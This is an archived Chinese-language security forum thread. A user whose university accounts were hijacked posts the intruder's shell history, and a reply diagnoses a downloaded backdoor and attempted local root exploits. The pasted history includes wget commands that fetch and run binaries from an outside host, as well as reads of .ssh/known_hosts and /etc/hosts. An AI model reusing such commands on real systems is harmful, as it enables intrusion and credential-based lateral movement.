由买买提看人间百态

boards

本页内容为未名空间相应帖子的节选和存档,一周内的贴子最多显示50字,超过一周显示500字 访问原贴
Security版 - 高手救命:近日帐号被黑!
相关主题
rksh有关socks port probe
FTPD 的安全问题authentication and secret key establishment
[转载] 请大家帮忙看看,机器被黑了who can help me?
Need "Steal" the Adminstrator's pwdWin NT help needed!
这个是hacker入侵吗?-httpd记录紧急求助---机器被侵入.
网站被DoS攻击该怎么办???IRIX6.2-6.5怎么没有shadow文件?
How to overwrite "/bin/login"?opasswd相当于passwd还是shadow,还是啥也不是?
初级问题求助!How to know admistrator's passwd in NT
相关话题的讨论汇总
话题: ssh话题: wget话题: cd话题: hosts话题: email
进入Security版参与讨论
1 (共1页)
y*j
发帖数: 32
1
我在学校里面,收发 Email 都喜欢 ssh 到系
服务器上后用 pine。今日忽然发现有人用我的
用户名和密码登陆:黑客太牛了,居然知道我的
密码。而且,他从我的 .ssh 目录下知道我还
ssh 过其他地方,于是他一个一个登陆过去,
都知道用户名和密码!都不知道他是怎么弄的。
幸好他好象也没有干一些坏事情,例如删除文件
发 Email 之类的。下面是我的 .history
各位高手看看怎么回事,怎么解决。
cd .ssh
cat known_hosts
uname -a
w
wget another00.home.ro/ups
chmod +x ups
./ups
wget another00.home.ro/local1.tgz
cd local
tar -xzvf local1.tgz
cd local
./mem
id
./t
./prt
./su
ls
./brk
另一个服务器上的:
#+1093705127
uname -a
#+1093705131
cd .ssh
#+1093705144
cat /etc/hosts
#+1093705173
wget www.ge
z*****y
发帖数: 14
2
From your post, it can't tell whether the hacker escalate to root succesfully.
The hacker might have sniffed your usr/passwd. Backdoor was downloaded and
installed, multiple local exploits were attempted to gain root privilege. All
the hosts running samba in your network that are vulnerable probably were
hacked already.
A thorough recovery would be reinstallation.

【在 y*j 的大作中提到】
: 我在学校里面,收发 Email 都喜欢 ssh 到系
: 服务器上后用 pine。今日忽然发现有人用我的
: 用户名和密码登陆:黑客太牛了,居然知道我的
: 密码。而且,他从我的 .ssh 目录下知道我还
: ssh 过其他地方,于是他一个一个登陆过去,
: 都知道用户名和密码!都不知道他是怎么弄的。
: 幸好他好象也没有干一些坏事情,例如删除文件
: 发 Email 之类的。下面是我的 .history
: 各位高手看看怎么回事,怎么解决。
: cd .ssh

1 (共1页)
进入Security版参与讨论
相关主题
How to know admistrator's passwd in NT这个是hacker入侵吗?-httpd记录
How to retrieve my passwd 网站被DoS攻击该怎么办???
htpasswdHow to overwrite "/bin/login"?
[转载] SGI workstation初级问题求助!
rksh有关socks port probe
FTPD 的安全问题authentication and secret key establishment
[转载] 请大家帮忙看看,机器被黑了who can help me?
Need "Steal" the Adminstrator's pwdWin NT help needed!
相关话题的讨论汇总
话题: ssh话题: wget话题: cd话题: hosts话题: email